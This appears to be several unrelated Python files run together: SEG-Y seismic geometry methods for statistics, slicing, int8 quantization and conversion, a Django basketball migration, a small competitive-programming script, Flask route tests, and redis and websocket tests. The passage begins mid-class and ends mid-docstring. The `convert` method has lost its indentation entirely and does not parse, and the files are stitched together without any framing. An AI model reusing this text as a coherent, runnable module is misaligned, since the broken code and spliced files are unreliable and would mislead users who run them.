        self.rotation_matrix = self.compute_rotation_matrix()
        self.area = self.compute_area()
    except (ValueError, KeyError): # single line SEG-Y
        self.rotation_matrix = None
        self.area = -1.
def add_attributes(self):
    """ Infer info about current index from `dataframe` attribute. """
    self.index_len = len(self.index_headers)
    # Reusable all-zero trace, returned for missing trace indices.
    self._zero_trace = np.zeros(self.depth)
    # Unique values in each of the indexing column
    self.unsorted_uniques = [np.unique(self.dataframe.index.get_level_values(i).values)
                             for i in range(self.index_len)]
    self.uniques = [np.sort(item) for item in self.unsorted_uniques]
    # Per index level: header value -> ordinal position; used as coordinates
    # into the stats matrices (see `_get_store_key`).
    self.uniques_inversed = [{v: j for j, v in enumerate(self.uniques[i])}
                             for i in range(self.index_len)]
    # Trace-header byte locations of the indexing headers.
    self.byte_no = [getattr(segyio.TraceField, h) for h in self.index_headers]
    self.offsets = [np.min(item) for item in self.uniques]
    self.lens = [len(item) for item in self.uniques]
    self.ranges = [(np.min(item), np.max(item)) for item in self.uniques]
    self.cube_shape = np.asarray([*self.lens, self.depth])
def _get_store_key(self, traceseqno):
    """ Map a trace sequence number to its coordinates in the stats matrices. """
    header = self.segyfile.header[traceseqno]
    raw_values = [header.get(byte) for byte in self.byte_no]
    # Translate each raw header value into its ordinal position per level.
    return tuple(mapping[value]
                 for mapping, value in zip(self.uniques_inversed, raw_values))
def collect_stats(self, spatial=True, bins=25, num_keep=10000, pbar=True, **kwargs):
    """ Pass through file data to collect stats:
    - min/max values.
    - a number of quantiles of values in the cube.
    - certain amount of traces are stored in a `trace_container` attribute.

    If `spatial` is True, makes an additional pass through the cube to obtain following:
    - min/max/mean/std for every trace - `min_matrix`, `max_matrix` and so on.
    - histogram of values for each trace: - `hist_matrix`.
    - bins for histogram creation: - `bins`.

    Parameters
    ----------
    spatial : bool
        Whether to collect additional stats.
    bins : int or str
        Number of bins or name of automatic algorithm of defining number of bins.
    num_keep : int
        Number of traces to store.
    pbar : bool
        Whether to show progress bars.
    """
    #pylint: disable=not-an-iterable
    _ = kwargs
    num_traces = len(self.segyfile.header)
    # Keep roughly `num_keep` sample traces, but always at least one.
    num_keep = min(num_keep, num_traces // 10) or 1
    frequency = num_traces // num_keep

    # Get min/max values, store some of the traces
    trace_container = []
    value_min, value_max = np.inf, -np.inf
    min_matrix, max_matrix = np.full(self.lens, np.nan), np.full(self.lens, np.nan)
    for i in Notifier(pbar, desc='Finding min/max')(range(num_traces)):
        trace = self.segyfile.trace[i]
        store_key = self._get_store_key(i)
        trace_min, trace_max = find_min_max(trace)
        min_matrix[store_key] = trace_min
        max_matrix[store_key] = trace_max
        # Keep every `frequency`-th non-constant trace as an amplitude sample.
        if i % frequency == 0 and trace_min != trace_max:
            trace_container.extend(trace.tolist())
            #TODO: add dtype for storing

    # Store everything into instance
    self.min_matrix, self.max_matrix = min_matrix, max_matrix
    # Fix: `np.int`/`np.float` aliases were removed in NumPy >= 1.24; use
    # explicit dtypes (int32 matches `zero_traces` creation in `process`).
    self.zero_traces = (min_matrix == max_matrix).astype(np.int32)
    self.zero_traces[np.isnan(min_matrix)] = 1
    value_min = np.nanmin(min_matrix)
    value_max = np.nanmax(max_matrix)

    # Collect more spatial stats: min, max, mean, std, histograms matrices
    if spatial:
        # Make bins
        bins = np.histogram_bin_edges(None, bins, range=(value_min, value_max)).astype(np.float64)
        self.bins = bins
        # Create containers
        hist_matrix = np.full((*self.lens, len(bins)-1), np.nan)
        # Iterate over traces
        for i in Notifier(pbar, desc=f'Collecting stats for {self.displayed_name}')(range(num_traces)):
            trace = self.segyfile.trace[i]
            store_key = self._get_store_key(i)
            # For each trace, we store an entire histogram of amplitudes
            val_min, val_max = find_min_max(trace)
            if val_min != val_max:
                histogram = np.histogram(trace, bins=bins)[0]
                hist_matrix[store_key] = histogram
        # Restore stats from histogram: mean/std via bin midpoints.
        midpoints = (bins[1:] + bins[:-1]) / 2
        probs = hist_matrix / np.sum(hist_matrix, axis=-1, keepdims=True)
        mean_matrix = np.sum(probs * midpoints, axis=-1)
        std_matrix = np.sqrt(np.sum((np.broadcast_to(midpoints, (*mean_matrix.shape, len(midpoints))) - \
                                     mean_matrix.reshape(*mean_matrix.shape, 1))**2 * probs,
                                    axis=-1))
        # Store everything into instance
        self.mean_matrix, self.std_matrix = mean_matrix, std_matrix
        self.hist_matrix = hist_matrix

    # Global value statistics from the sampled traces.
    self.trace_container = np.array(trace_container)
    self.v_uniques = len(np.unique(trace_container))
    self.v_min, self.v_max = value_min, value_max
    self.v_mean, self.v_std = np.mean(trace_container), np.std(trace_container)
    self.v_q001, self.v_q01, self.v_q05 = np.quantile(trace_container, [0.001, 0.01, 0.05])
    self.v_q999, self.v_q99, self.v_q95 = np.quantile(trace_container, [0.999, 0.99, 0.95])
    self.has_stats = True
    self.store_meta()
# Compute stats from CDP/LINES correspondence
def compute_rotation_matrix(self):
    """ Compute transform from INLINE/CROSSLINE coordinates to CDP system. """
    ix_points = []
    cdp_points = []
    # Three point pairs are enough to define an affine transform.
    # NOTE(review): points are drawn at random with no collinearity check;
    # degenerate picks would produce a bad matrix -- confirm acceptable.
    for _ in range(3):
        idx = np.random.randint(len(self.dataframe))
        trace = self.segyfile.header[idx]
        # INLINE_3D -> CDP_X, CROSSLINE_3D -> CDP_Y
        ix = (trace[segyio.TraceField.INLINE_3D], trace[segyio.TraceField.CROSSLINE_3D])
        cdp = (trace[segyio.TraceField.CDP_X], trace[segyio.TraceField.CDP_Y])
        ix_points.append(ix)
        cdp_points.append(cdp)
    rotation_matrix = cv2.getAffineTransform(np.float32(ix_points), np.float32(cdp_points))
    return rotation_matrix
def compute_area(self, correct=True, shift=50):
    """ Compute approximate area of the cube in square kilometres.

    Estimates per-line CDP spacing from traces `shift` lines apart around
    the cube center, then multiplies the line extents.
    NOTE(review): assumes CDP_X/CDP_Y units are metres -- confirm for the file.

    Parameters
    ----------
    correct : bool
        Whether to correct computed area for zero traces.
    shift : int
        Line distance between the probe traces used for spacing estimation.
    """
    # Central iline/xline values.
    i = self.ilines[self.ilines_len // 2]
    x = self.xlines[self.xlines_len // 2]
    # Central trace coordinates
    idx = self.dataframe['trace_index'][(i, x)]
    trace = self.segyfile.header[idx]
    cdp_x, cdp_y = (trace[segyio.TraceField.CDP_X], trace[segyio.TraceField.CDP_Y])

    # Two shifted traces
    idx_dx = self.dataframe['trace_index'][(i, x + shift)]
    trace_dx = self.segyfile.header[idx_dx]
    cdp_x_delta = abs(trace_dx[segyio.TraceField.CDP_X] - cdp_x)

    idx_dy = self.dataframe['trace_index'][(i + shift, x)]
    trace_dy = self.segyfile.header[idx_dy]
    cdp_y_delta = abs(trace_dy[segyio.TraceField.CDP_Y] - cdp_y)

    # Traces if CDP_X/CDP_Y coordinate system is rotated on 90 degrees with respect to ILINES/CROSSLINES
    if cdp_x_delta == 0 and cdp_y_delta == 0:
        idx_dx = self.dataframe['trace_index'][(i + shift, x)]
        trace_dx = self.segyfile.header[idx_dx]
        cdp_x_delta = abs(trace_dx[segyio.TraceField.CDP_X] - cdp_x)

        idx_dy = self.dataframe['trace_index'][(i, x + shift)]
        trace_dy = self.segyfile.header[idx_dy]
        cdp_y_delta = abs(trace_dy[segyio.TraceField.CDP_Y] - cdp_y)

    # Per-line spacing in CDP units.
    cdp_x_delta /= shift
    cdp_y_delta /= shift

    ilines_km = cdp_y_delta * self.ilines_len / 1000
    xlines_km = cdp_x_delta * self.xlines_len / 1000
    area = ilines_km * xlines_km

    # Subtract the contribution of dead traces, if known.
    if correct and hasattr(self, 'zero_traces'):
        area -= (cdp_x_delta / 1000) * (cdp_y_delta / 1000) * np.sum(self.zero_traces)
    return round(area, 2)
# Methods to load actual data from SEG-Y
# 1D
def load_trace(self, index):
    """ Load individual trace from segyfile.
    If passed `np.nan`, returns trace of zeros.
    """
    # TODO: can be improved by creating buffer and writing directly to it
    if np.isnan(index):
        return self._zero_trace
    return self.segyfile.trace.raw[int(index)]
def load_traces(self, trace_indices):
    """ Stack multiple traces together into one 2D array. """
    # TODO: can be improved by preallocating memory and passing it as a buffer to `load_trace`
    return np.stack(list(map(self.load_trace, trace_indices)))
# 2D
@lru_cache(128, attributes='index_headers')
def load_slide(self, loc=None, axis=0, start=None, end=None, step=1, stable=True):
    """ Create indices and load actual traces for one slide.

    If the current index is 1D, then slide is defined by `start`, `end`, `step`.
    If the current index is 2D, then slide is defined by `loc` and `axis`.
    Results are LRU-cached; the cache is keyed on `index_headers` too.

    Parameters
    ----------
    loc : int
        Number of slide to load.
    axis : int
        Number of axis to load slide along.
    start, end, step : ints
        Parameters of slice loading for 1D index.
    stable : bool
        Whether or not to use the same sorting order as in the segyfile.
    """
    if axis in [0, 1]:
        indices = self.make_slide_indices(loc=loc, start=start, end=end, step=step, axis=axis, stable=stable)
        slide = self.load_traces(indices)
    elif axis == 2:
        # Depth slices are read directly through segyio.
        slide = self.segyfile.depth_slice[loc]
        if slide.shape[0] == np.prod(self.lens):
            slide = slide.reshape(self.lens)
        else:
            # Some traces are absent: scatter the present values into a full
            # grid, leaving dead positions at zero.
            buffer = np.zeros_like(self.zero_traces, dtype=np.float32)
            buffer[self.zero_traces == 0] = slide
            slide = buffer
    return slide
def make_slide_indices(self, loc=None, axis=0, start=None, end=None, step=1, stable=True, return_iterator=False):
    """ Choose appropriate version of index creation, depending on length of the current index.

    Parameters
    ----------
    loc : int
        Position of the slide along `axis` (2D index only).
    axis : int
        Axis to slice along (2D index only).
    start, end, step : ints
        Parameters of slice loading for 1d index.
    stable : bool
        Whether or not to use the same sorting order as in the segyfile.
    return_iterator : bool
        Whether to also return the same iterator that is used to index current `dataframe`.
        Can be useful for subsequent loads from the same place in various instances.

    Raises
    ------
    NotImplementedError
        For a 3D index.
    ValueError
        For an index of length 4 or more.
    """
    if self.index_len == 1:
        _ = loc, axis
        result = self.make_slide_indices_1d(start=start, end=end, step=step, stable=stable,
                                            return_iterator=return_iterator)
    elif self.index_len == 2:
        _ = start, end, step
        result = self.make_slide_indices_2d(loc=loc, axis=axis, stable=stable,
                                            return_iterator=return_iterator)
    elif self.index_len == 3:
        raise NotImplementedError('Yet to be done!')
    else:
        # Fixed typo in the error message ('lenght' -> 'length').
        raise ValueError('Index length must be less than 4. ')
    return result
def make_slide_indices_1d(self, start=None, end=None, step=1, stable=True, return_iterator=False):
    """ 1D version of index creation.

    Parameters
    ----------
    start, end : int, optional
        Inclusive bounds over the index values; default to the full range.
    step : int
        Stride over index values.
    stable : bool
        Whether or not to use the same sorting order as in the segyfile.
    return_iterator : bool
        Whether to also return the iterator of index values used.
    """
    # Fix: the previous `start or default` idiom wrongly replaced a
    # legitimate `start=0` (or `end=0`) with the default; test for None.
    start = self.offsets[0] if start is None else start
    end = self.uniques[0][-1] if end is None else end

    if stable:
        iterator = self.dataframe.index[(self.dataframe.index >= start) & (self.dataframe.index <= end)]
        iterator = iterator.values[::step]
    else:
        iterator = np.arange(start, end+1, step)

    # Missing index values map to NaN -> `load_trace` returns a zero trace.
    indices = self.dataframe['trace_index'].reindex(iterator, fill_value=np.nan).values

    if return_iterator:
        return indices, iterator
    return indices
def make_slide_indices_2d(self, loc, axis=0, stable=True, return_iterator=False):
    """ 2D version of index creation.

    Parameters
    ----------
    loc : int
        Ordinal position of the slide along `axis`.
    axis : int
        Which of the two index levels to fix (0 or 1).
    stable : bool
        Whether or not to use the same sorting order as in the segyfile.
    return_iterator : bool
        Whether to also return the iterator of (level0, level1) pairs.
    """
    other_axis = 1 - axis
    location = self.uniques[axis][loc]
    if stable:
        # Keep only the pairs that actually exist in the file, in file order.
        others = self.dataframe[self.dataframe.index.get_level_values(axis) == location]
        others = others.index.get_level_values(other_axis).values
    else:
        others = self.uniques[other_axis]
    iterator = list(zip([location] * len(others), others) if axis == 0 else zip(others, [location] * len(others)))
    indices = self.dataframe['trace_index'].reindex(iterator, fill_value=np.nan).values

    #TODO: keep only uniques, when needed, with `nan` filtering
    if stable:
        # NOTE(review): np.unique also sorts, so the order of `indices` may
        # differ from `iterator` here -- confirm callers don't rely on order.
        indices = np.unique(indices)

    if return_iterator:
        return indices, iterator
    return indices
# 3D
def _load_crop(self, locations):
    """ Load 3D crop from the cube.

    Parameters
    ----------
    locations : sequence of slices
        List of desired slices to load: along the first index, the second, and depth.

    Example
    -------
    If the current index is `INLINE_3D` and `CROSSLINE_3D`, then to load
    5:110 ilines, 100:1105 crosslines, 0:700 depths, locations must be::
        [slice(5, 110), slice(100, 1105), slice(0, 700)]
    """
    # Open slice ends fall back to the full cube extent.
    shape = np.array([((slc.stop or stop) - (slc.start or 0)) for slc, stop in zip(locations, self.cube_shape)])
    indices = self.make_crop_indices(locations)
    # Load whole traces, then cut the requested depth window and reshape.
    crop = self.load_traces(indices)[..., locations[-1]].reshape(shape)
    return crop
def make_crop_indices(self, locations):
    """ Create indices for 3D crop loading. """
    # Cartesian product of the requested positions on both index levels.
    iterator = list(product(*[[self.uniques[idx][i] for i in range(locations[idx].start, locations[idx].stop)]
                              for idx in range(2)]))
    indices = self.dataframe['trace_index'].reindex(iterator, fill_value=np.nan).values
    # Drop duplicate trace numbers while preserving first-occurrence order.
    _, unique_ind = np.unique(indices, return_index=True)
    return indices[np.sort(unique_ind, kind='stable')]
def load_crop(self, locations, threshold=15, mode='adaptive', **kwargs):
    """ Smart choice between using :meth:`._load_crop` and stacking multiple slides created by :meth:`.load_slide`.

    Parameters
    ----------
    locations : sequence of slices
        Slices along the first index, the second index and depth.
    mode : str
        If `adaptive`, then function to load is chosen automatically.
        If `slide` or `crop`, then uses that function to load data.
    threshold : int
        Upper bound for amount of slides to load. Used only in `adaptive` mode.
    """
    _ = kwargs
    shape = np.array([((slc.stop or stop) - (slc.start or 0)) for slc, stop in zip(locations, self.cube_shape)])
    axis = np.argmin(shape)
    if mode == 'adaptive':
        if axis in [0, 1]:
            # Thin crops are cheaper via (cached) slides; thick ones via traces.
            mode = 'slide' if min(shape) < threshold else 'crop'
        else:
            # For depth-thin crops, compare lateral coverage with the full cube.
            flag = np.prod(shape[:2]) / np.prod(self.cube_shape[:2])
            mode = 'slide' if flag > 0.1 else 'crop'

    if mode == 'slide':
        slc = locations[axis]
        # Stack per-slide 2D cuts along the thinnest axis.
        if axis == 0:
            return np.stack([self.load_slide(loc, axis=axis)[locations[1], locations[2]]
                             for loc in range(slc.start, slc.stop)], axis=axis)
        if axis == 1:
            return np.stack([self.load_slide(loc, axis=axis)[locations[0], locations[2]]
                             for loc in range(slc.start, slc.stop)], axis=axis)
        if axis == 2:
            return np.stack([self.load_slide(loc, axis=axis)[locations[0], locations[1]]
                             for loc in range(slc.start, slc.stop)], axis=axis)
    return self._load_crop(locations)
# Quantization
def compute_quantization_parameters(self, ranges='q99', clip=True, center=False):
    """ Make bins for int8 quantization and convert value-stats.

    Parameters
    ----------
    ranges : str or sequence of two numbers
        Ranges to quantize data to. Available options are:
            - `q95`, `q99`, `q999` to clip data to respective quantiles.
            - `same` keep the same range of data.
    clip : bool
        Whether to clip data to selected ranges.
    center : bool
        Whether to make data have 0-mean before quantization.
    """
    # Symmetric range around zero, chosen from the collected value stats.
    ranges_dict = {
        'q95': min(abs(self.v_q05), abs(self.v_q95)),
        'q99': min(abs(self.v_q01), abs(self.v_q99)),
        'q999': min(abs(self.v_q001), abs(self.v_q999)),
        'same': max(abs(self.v_min), abs(self.v_max)),
    }
    if ranges in ranges_dict:
        ranges = ranges_dict[ranges]
        ranges = (-ranges, +ranges)
    if center:
        ranges = tuple(item - self.v_mean for item in ranges)
    self.qnt_ranges = ranges

    # Fix: the `np.float` alias was removed in NumPy >= 1.24; use np.float64.
    self.qnt_bins = np.histogram_bin_edges(None, bins=254, range=ranges).astype(np.float64)
    self.qnt_clip = clip
    self.qnt_center = center

    # Compute quantized statistics
    quantized_tc = self.quantize(self.trace_container)
    self.qnt_min, self.qnt_max = self.quantize(self.v_min), self.quantize(self.v_max)
    self.qnt_mean, self.qnt_std = np.mean(quantized_tc), np.std(quantized_tc)
    self.qnt_q001, self.qnt_q01, self.qnt_q05 = np.quantile(quantized_tc, [0.001, 0.01, 0.05])
    self.qnt_q999, self.qnt_q99, self.qnt_q95 = np.quantile(quantized_tc, [0.999, 0.99, 0.95])

    # Estimate difference after quantization
    quantized_tc += 127
    restored_tc = self.qnt_bins[quantized_tc]
    self.qnt_error = np.mean(np.abs(restored_tc - self.trace_container)) / self.v_std
def quantize(self, array):
    """ Convert array of floats to int8 values.

    Fix: the previous `array -= self.v_mean` mutated the caller's array in
    place -- with `center=True`, `compute_quantization_parameters` silently
    shifted `self.trace_container` itself. All steps are now out-of-place.
    """
    if self.qnt_center:
        array = array - self.v_mean  # out-of-place: keep caller's data intact
    if self.qnt_clip:
        array = np.clip(array, *self.qnt_ranges)
    # digitize yields bin numbers 0..254; shift into the int8 range.
    array = np.digitize(array, self.qnt_bins) - 128
    return array.astype(np.int8)
# Convert SEG-Y
def convert(self, format='blosc', path=None, postfix='', projections='ixh',
quantize=True, ranges='q99', clip=True, center=False, store_meta=True, pbar=True, **kwargs):
""" Convert SEG-Y file to a more effective storage.
Parameters
----------
format : {'hdf5', 'qhdf5', 'blosc', 'qblosc}
Format of storage to convert to: `blosc` takes less space, but a touch slower, than `hdf5`.
Prefix `q` sets the `quantize` parameter to True.
path : str
If provided, then path to save file to.
Otherwise, file is saved under the same name with different extension.
postfix : str
Optional string to add before extension. Used only if the `path` is not provided.
projections : str
Which projections of data to store: `i` for iline one, `x` for the crossline, `h` for depth.
quantize : bool
Whether to binarize data to `int8` dtype. `ranges`, `clip` and `center` define parameters of quantization.
Binarization is done uniformly over selected `ranges` of values.
If True, then `q` is appended to extension.
ranges : str
Ranges to quantize data to. Available options are:
- `q95`, `q99`, `q999` to clip data to respective quantiles.
- `same` keep the same range of data.
clip : bool
Whether to clip data to selected ranges.
center : bool
Whether to make data have 0-mean before quantization.
store_meta : bool
Whether to store meta near the save file.
pbar : bool
Whether to show progress bar during conversion.
kwargs : dict
Other parameters, passed directly to the file constructor of chosen format.
If format is `blosc`:
- `cname` for algorithm of compression. Default is `lz4hc`.
- `clevel` for level of compression. Default is 6.
- `shuffle` for bitshuffle during compression. Default is False.
"""
#pylint: disable=import-outside-toplevel
# Select format
if format.startswith('q'):
quantize = True
format = format[1:]
from .converted import SeismicGeometryConverted
if format == 'blosc':
from .blosc import BloscFile
constructor, mode = BloscFile, 'w'
elif format == 'hdf5':
constructor, mode = h5py.File, 'w-'
# Quantization
if quantize:
self.compute_quantization_parameters(ranges=ranges, clip=clip, center=center)
dtype, transform = np.int8, self.quantize
else:
dtype, transform = np.float32, lambda array: array
if path is None:
fmt_prefix = 'q' if quantize else ''
if postfix == '' and len(projections) < 3:
postfix = '_' + projections
path = os.path.join(os.path.dirname(self.path), f'{self.short_name}{postfix}.{fmt_prefix}{format}')
# Remove file, if exists
if os.path.exists(path):
os.remove(path)
# Create file and datasets inside
with constructor(path, mode=mode, **kwargs) as file:
total = (('i' in projections) * self.cube_shape[0] +
('x' in projections) * self.cube_shape[1] +
('h' in projections) * self.cube_shape[2])
progress_bar = Notifier(pbar, total=total)
name = os.path.basename(path)
for p in projections:
axis = self.parse_axis(p)
cube_name = SeismicGeometryConverted.AXIS_TO_NAME[axis]
order = SeismicGeometryConverted.AXIS_TO_ORDER[axis]
cube = file.create_dataset(cube_name, shape=self.cube_shape[order], dtype=dtype)
progress_bar.set_description(f'Creating {name}; {p}-projection')
for idx in range(self.cube_shape[axis]):
slide = self.load_slide(idx, axis=axis, stable=False)
slide = slide.T if axis == 1 else slide
slide = transform(slide)
cube[idx, :, :] = slide
progress_bar.update()
progress_bar.close()
if store_meta:
if not self.has_stats:
self.collect_stats(pbar=pbar)
path_meta = os.path.splitext(path)[0] + '.meta'
self.store_meta(path_meta)
return SeismicGeometry(path)
def convert_to_hdf5(self, path=None, postfix='', projections='ixh',
                    quantize=True, ranges='q99', clip=True, center=False, store_meta=True, pbar=True, **kwargs):
    """ Convenient alias for HDF5 conversion: forwards every argument to `convert`. """
    return self.convert(format='hdf5', path=path, postfix=postfix, projections=projections,
                        quantize=quantize, ranges=ranges, clip=clip, center=center,
                        store_meta=store_meta, pbar=pbar, **kwargs)
def convert_to_blosc(self, path=None, postfix='', projections='ixh',
                     quantize=True, ranges='q99', clip=True, center=False, store_meta=True, pbar=True, **kwargs):
    """ Convenient alias for BLOSC conversion: forwards every argument to `convert`. """
    return self.convert(format='blosc', path=path, postfix=postfix, projections=projections,
                        quantize=quantize, ranges=ranges, clip=clip, center=center,
                        store_meta=store_meta, pbar=pbar, **kwargs)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Split the single team-rebound counters of `game` into def/off pairs
    and update the choice sets of the `playbyplay` fields.

    NOTE(review): the second rename maps `team2_team_rebounds` onto
    `team1_off_rebounds` (not a `team2_...` name) — presumably the two
    legacy columns are being repurposed as team1's def/off pair while
    brand-new columns are added for team2; confirm against the intended
    schema before changing anything here.
    """

    dependencies = [
        # Must run after the app's initial schema migration
        ('basketball', '0001_initial'),
    ]

    operations = [
        # Reuse legacy column as team1 defensive rebounds
        migrations.RenameField(
            model_name='game',
            old_name='team1_team_rebounds',
            new_name='team1_def_rebounds',
        ),
        # Reuse legacy team2 column as team1 OFFENSIVE rebounds (see class note)
        migrations.RenameField(
            model_name='game',
            old_name='team2_team_rebounds',
            new_name='team1_off_rebounds',
        ),
        # Fresh counters for team2
        migrations.AddField(
            model_name='game',
            name='team2_def_rebounds',
            field=models.PositiveIntegerField(default=0),
        ),
        migrations.AddField(
            model_name='game',
            name='team2_off_rebounds',
            field=models.PositiveIntegerField(default=0),
        ),
        migrations.AlterField(
            model_name='playbyplay',
            name='assist',
            field=models.CharField(max_length=30, choices=[('ast', 'AST'), ('pot', 'POT')]),
        ),
        migrations.AlterField(
            model_name='playbyplay',
            name='primary_play',
            field=models.CharField(max_length=30, choices=[('fgm', 'FGM'), ('fga', 'FGA'), ('3pm', '3PM'), ('3pa', '3PA'), ('stl', 'STL'), ('blk', 'BLK'), ('to', 'TO')]),
        ),
        migrations.AlterField(
            model_name='playbyplay',
            name='secondary_play',
            field=models.CharField(blank=True, choices=[('dreb', 'DREB'), ('oreb', 'OREB'), ('ba', 'BA')], max_length=30),
        ),
    ]
|
# Read `t` test cases. Each case: an integer `n`, then three rows of
# integers (each truncated to `n` values). Collapse runs of consecutive
# duplicates inside every row, concatenate the three collapsed rows in
# order, and print the first `n` surviving values.
t = int(input())
for _ in range(t):
    n = int(input())
    merged = []
    for _row in range(3):
        values = list(map(int, input().strip().split()))[:n]
        # Keep the first element, then every element that differs from its predecessor
        merged.append(values[0])
        for prev, cur in zip(values, values[1:]):
            if cur != prev:
                merged.append(cur)
    print(merged[:n])
|
from app import app
def test_status():
    """The root route answers with a successful (200) status code."""
    client = app.test_client()
    assert client.get('/').status_code == 200
def test_contents():
    """The root page body contains the expected name."""
    client = app.test_client()
    assert b'Myk' in client.get('/').data
|
# Run these tests with `DJANGO_SETTINGS_MODULE=gim.settings.tests trial gim.test_ws`
import json
import logging
import unittest
import txredisapi as txredis
from django.conf import settings
from limpyd.exceptions import DoesNotExist
from mock import call, patch
from redis.lock import Lock
from twisted.internet.defer import inlineCallbacks
from twisted.trial import unittest as txunittest
from gim import ws
# Rebind `patch.object` onto itself so it resolves as a plain attribute
# access (no-op at runtime; presumably here to appease a linter or an
# import checker — confirm before removing).
patch.object = patch.object

# Silence every log record for the duration of the test run.
logging.disable(logging.CRITICAL)

# Safety guard: refuse to run against anything but the dedicated test
# settings, so real data can never be flushed by the redis fixtures below.
if not getattr(settings, 'TEST_SETTINGS', False):
    raise RuntimeError('Tests must be run with DJANGO_SETTINGS_MODULE=gim.settings.tests')
class UtilsTestCase(unittest.TestCase):
    """Unit tests for the module-level helpers of `gim.ws`
    (serialization, topic normalization and topic-rule matching)."""

    def test_serialize(self):
        result = ws.serialize(123, 'foo', 1, b=2)
        self.assertEqual(
            json.loads(result),
            {
                'msg_id': 123,
                'topic': 'foo',
                'args': [1],
                'kwargs': {'b': 2}
            }
        )

    def test_normalize_topic(self):
        # Already-prefixed topics stay untouched, bare ones get `gim.` prepended
        result = ws.normalize_topic('gim.foo')
        self.assertEqual(result, 'gim.foo')
        result = ws.normalize_topic('foo')
        self.assertEqual(result, 'gim.foo')

    def test_add_ws_extra_details(self):
        # Mutates the dict in place and returns None
        d = {'x': 'y'}
        result = ws.add_ws_extra_details(d, 'foo', 1)
        self.assertIsNone(result)
        self.assertEqual(d, {'x': 'y', 'ws_extra': {'topic': 'foo', 'msg_id': 1}})

    def test_prepare_rules(self):
        result = ws.prepare_rules(None)
        self.assertIsNone(result)
        result = ws.prepare_rules([])
        self.assertEqual(result, [])
        result = ws.prepare_rules([
            ('foo', ws.TOPIC_TYPE_EXACT),
            ('foo.bar', ws.TOPIC_TYPE_EXACT),
            ('bar', ws.TOPIC_TYPE_PREFIX),
            ('bar.baz.', ws.TOPIC_TYPE_PREFIX),
            ('foo..baz', ws.TOPIC_TYPE_WILDCARD),
            ('..baz', ws.TOPIC_TYPE_WILDCARD),
            ('foo..', ws.TOPIC_TYPE_WILDCARD),
            ('.bar.', ws.TOPIC_TYPE_WILDCARD),
            ('..', ws.TOPIC_TYPE_WILDCARD),
        ])
        self.assertEqual(len(result), 3)
        self.assertEqual(result[ws.TOPIC_TYPE_EXACT], [
            ('foo', 'foo'),
            ('foo.bar', 'foo.bar'),
        ])
        self.assertEqual(result[ws.TOPIC_TYPE_PREFIX], [
            ('bar', 'bar'),
            ('bar.baz.', 'bar.baz.'),
        ])
        # Wildcard rules are compiled to regexes: each empty segment in the
        # pattern matches exactly one dot-free chunk of the topic
        self.assertEqual([(o, r.pattern) for o, r in result[ws.TOPIC_TYPE_WILDCARD]], [
            ('foo..baz', r'^foo\.[^\.]+\.baz$'),
            ('..baz', r'^[^\.]+\.[^\.]+\.baz$'),
            ('foo..', r'^foo\.[^\.]+\.[^\.]+$'),
            ('.bar.', r'^[^\.]+\.bar\.[^\.]+$'),
            ('..', r'^[^\.]+\.[^\.]+\.[^\.]+$'),
        ])

    def test_restrict_topics(self):
        # No rules (None) -> every topic kept, with no matching rule attached
        result = ws.restrict_topics(['foo', 'bar'], None)
        self.assertEqual(result, {
            'foo': [],
            'bar': [],
        })
        # Empty rule list -> nothing kept
        result = ws.restrict_topics(['foo', 'bar'], [])
        self.assertEqual(result, {})
        result = ws.restrict_topics([
            'foo',
            'bar',
            'bar2',
            'baz',
            'foo.bar.baz',
            'foo.bar2.baz',
            'foo.bar2.baz2',
            'foo.bar.qux.baz',
            'foo.bar.qux.quz.baz',
        ], [
            ('foo', ws.TOPIC_TYPE_EXACT),
            ('bar', ws.TOPIC_TYPE_PREFIX),
            ('bar2', ws.TOPIC_TYPE_EXACT),
            ('foo..baz', ws.TOPIC_TYPE_WILDCARD),
        ])
        self.assertEqual(result, {
            'foo': [('foo', ws.TOPIC_TYPE_EXACT), ],
            'bar': [('bar', ws.TOPIC_TYPE_PREFIX), ],
            'bar2': [('bar2', ws.TOPIC_TYPE_EXACT), ('bar', ws.TOPIC_TYPE_PREFIX), ],
            'foo.bar.baz': [('foo..baz', ws.TOPIC_TYPE_WILDCARD), ],
            'foo.bar2.baz': [('foo..baz', ws.TOPIC_TYPE_WILDCARD), ],
        })

        # test values from
        # https://github.com/crossbario/crossbar/blob/master/crossbar/router/test/test_wildcard.py
        WILDCARDS = ['.', 'a..c', 'a.b.', 'a..', '.b.', '..', 'x..', '.x.', '..x', 'x..x', 'x.x.',
                     '.x.x', 'x.x.x']
        MATCHES = {
            'abc': [],
            'a.b': ['.'],
            'a.b.c': ['a..c', 'a.b.', 'a..', '.b.', '..'],
            'a.x.c': ['a..c', 'a..', '..', '.x.'],
            'a.b.x': ['a.b.', 'a..', '.b.', '..', '..x'],
            'a.x.x': ['a..', '..', '.x.', '..x', '.x.x'],
            'x.y.z': ['..', 'x..'],
            'a.b.c.d': []
        }
        for topic in MATCHES:
            for pattern in WILDCARDS:
                result = ws.restrict_topics([topic], [(pattern, ws.TOPIC_TYPE_WILDCARD)])
                if pattern in MATCHES[topic]:
                    self.assertEqual(result, {topic: [(pattern, ws.TOPIC_TYPE_WILDCARD)]},
                                     'Pattern `%s` should match topic `%s`, but it doesn\'t match' % (
                                         pattern, topic))
                else:
                    self.assertEqual(result, {},
                                     'Pattern `%s` should not match topic `%s`, but it matches' % (
                                         pattern, topic))
class UsingSyncRedis(unittest.TestCase):
    """Base test case that flushes the synchronous limpyd redis database
    before and after every test, so cases never see each other's data."""

    @classmethod
    def flushdb(cls):
        ws.get_ws_limpyd_database().connection.flushdb()

    def setUp(self):
        super(UsingSyncRedis, self).setUp()
        self.flushdb()

    def tearDown(self):
        self.flushdb()
        super(UsingSyncRedis, self).tearDown()
class UsingAsyncRedis(txunittest.TestCase):
    """Base Twisted test case opening a txredis connection to the websocket
    redis database, flushed before and after every test."""

    @inlineCallbacks
    def flushdb(self):
        yield self.db.flushdb()

    @inlineCallbacks
    def setUp(self):
        super(UsingAsyncRedis, self).setUp()
        config = settings.LIMPYD_DB_WS_CONFIG
        self.db = yield txredis.Connection(
            host=config['host'],
            port=config['port'],
            dbid=config['db'],
            reconnect=False
        )
        # Point the async mixin at this per-test connection
        ws.AsyncHistoryMixin.redis_connection = self.db
        yield self.flushdb()

    @inlineCallbacks
    def tearDown(self):
        yield self.flushdb()
        yield self.db.disconnect()
        super(UsingAsyncRedis, self).tearDown()
class RepositoryHistoryTestCase(UsingSyncRedis):
    """Tests for the synchronous `ws.RepositoryHistory` limpyd model.

    NOTE(review): `async` is used below as a keyword-argument name, so this
